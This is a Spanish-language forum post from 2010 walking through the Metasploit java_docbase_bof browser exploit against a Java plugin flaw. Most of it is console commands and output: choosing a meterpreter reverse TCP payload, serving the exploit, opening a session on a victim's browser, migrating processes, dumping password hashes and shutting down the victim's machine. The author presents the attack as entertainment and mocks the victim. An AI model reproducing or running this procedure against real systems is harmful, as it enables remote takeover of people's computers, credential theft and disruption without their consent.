Explotando 0day en Java con metasploit

Administrador

Mensajes : 1000 Reputación : 142
Registrado : 11/08/2010
Localización : Nicaragua

Dom Oct 31, 2010 9:21 pm

Bueno gente me sigo entreteniendo con metasploit y esta vez les traigo el útlimo de java que sacaron estos muchachos llamado "java_docbase_bof", el autor es RuS0pr0, me puse a buscar algo de info, aparte de la de los enlaces de metasploit pero toy medio vago así que no busqué mucho, lo único que encontre rápido era un enlace de packet-storm, en el cúal este aparecía el nombre en el primer lugar de los 10 últimos subidos, pero cuando lo fui a ver decía file missing,bajon pero bue lo tenemos en metasploit,je, ok a las armas:

Abrimos metasploit, cargamos el exploit y vemos que nos tira el comando "info"

Código:

Código:: ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v3.5.1-dev [core:3.5 api:1.0] + -- --=[ 616 exploits - 306 auxiliary + -- --=[ 215 payloads - 27 encoders - 8 nops =[ svn r10827 updated today (2010.10.26) msf > use windows/browser/java_docbase_bof msf exploit(java_docbase_bof) > info Name: Sun Java Runtime New Plugin docbase Buffer Overflow Version: 10820 Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Great Provided by: jduck <jduck@metasploit.com> Available targets: Id Name -- ---- 0 Windows Universal (msvcr71.dll ROP) Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Payload information: Space: 1024 Avoid: 34 characters Description: This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a "launchjnlp" parameter, it will copy the contents of the "docbase" parameter to a stack-buffer using the "sprintf" function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address. NOTE: The string being copied is first passed through the "WideCharToMultiByte". Due to this, only characters which have a valid localized multibyte representation are allowed. Invalid characters will be replaced with question marks ('?'). This vulnerability was originally discovered independently by both Stephen Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't been done, all versions since version 6 Update 10 are believed to be affected by this vulnerability. This vulnerability was patched as part of the October 2010 Oracle Patch release. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3552 http://www.securityfocus.com/bid/44023 http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html http://www.zerodayinitiative.com/advisories/ZDI-10-206/ http://code.google.com/p/skylined/issues/detail?id=23 http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/ http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html Ok ya sabemos los parámetros a configurar, veamos loa payloads disponibles msf exploit(java_docbase_bof) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic/debug_trap normal Generic x86 Debug Trap generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline generic/tight_loop normal Generic x86 Tight Loop windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6) windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7) windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager windows/dllinject/reverse_http normal Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6) windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7) windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7) windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS) windows/download_exec normal Windows Executable Download and Execute windows/exec normal Windows Execute Command windows/messagebox normal Windows MessageBox windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6) windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7) windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6) windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7) windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS) windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6) windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7) windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6) windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7) windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7) windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS) windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6) windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7) windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6) windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7) windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS) windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6) windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7) windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager windows/shell/reverse_http normal Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6) windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7) windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7) windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS) windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6) windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7) windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager windows/upexec/reverse_http normal Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6) windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7) windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7) windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS) windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6) windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7) windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager windows/vncinject/reverse_http normal VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6) windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7) windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)

Ok configuramos todo y chekeamos que este bien:

Código:

Código:: msf exploit(java_docbase_bof) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(java_docbase_bof) > set LHOST 192.168.1.101 LHOST => 192.168.1.101 msf exploit(java_docbase_bof) > set URIPATH / URIPATH => / msf exploit(java_docbase_bof) > set SRVPORT 80 SRVPORT => 80 msf exploit(java_docbase_bof) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 80 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH / no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, none, process LHOST 192.168.1.101 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows Universal (msvcr71.dll ROP)

Todo perfecto así que exploit:

Código:: msf exploit(java_docbase_bof) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.101:4444 [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.1.101:80/ [*] Server started.

Abrimos, ponemos la dirección y la magia comienza:

Explotando 0day en Java con metasploit 1zbbak9

msf exploit(java_docbase_bof) >
[*] Sending exploit HTML to 192.168.1.100:1096
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.100:1097) at Tue Oct 26 09:25:14 -0300 2010
[*] Session ID 1 (192.168.1.101:4444 -> 192.168.1.100:1097) processing AutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3616)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)

Migra la sesión de meterpreter y el navegador crashea, algo bueno es que comparado al anterior que postee el exploit se carga bastante rápido y practicamente al toque tenemos shell, disminuyendo la posibilidad de que la víctima nos cierre el navegador antes de que meterpreter migre.

Explotando 0day en Java con metasploit Mmsro

Explotando 0day en Java con metasploit Mmsro

Interactuamos con la sesión, dumpeamos los hash para tener con que entretenernos despues y le apagamos la compu al remoto le hecha la culpa al windows que se le apaga:

Código:

Código:: msf exploit(java_docbase_bof) > sessions -i 1 [*] Starting interaction with 1... meterpreter > hashdump ASPNET:1008:b29ace650td0c05f0bfa5a736ecadb63:fbcd22b2d8ed614f7cb996bf996ebf73::: FDCC User:1005:921988ba001db8e1c41a0e2828864838:5f23a05483c0b292fdd922e6b05afa05::: HelpAssistant:1004:58n8fff5b883a8711ae36084c7644de3:11a7f388fda7f3416d46e6526b346bd2::: IUSR_XP_FDCC:1007:c36c50574cd910faaa15682618b8ea0c:2424cd6387fd1934538a7b22dc6873c7::: IWAM_XP_FDCC:1013:640b1823bca93499f622ce50e7db4fd3:8186be975dbb9ec184fffb4ae512788a::: Renamed_Admin:500:9225986ba001dc8e1c41a0e2828864838:5f23a05483c0b292fdd922e6b05afa05::: Renamed_Guest:501:aad3bo55b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0qE:\Java:1002:aad3b435b51404Beaad3b435b51404ee:b656a8c9fc573685ded4bb5b3a4da7dc::: User:1003:aad3b435b51474eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: meterpreter > shutdown Shutting down...

Explotando 0day en Java con metasploit 2wojalx

Código:

Código:: meterpreter > [*] Meterpreter session 1 closed. Reason: Died

1-Slandg-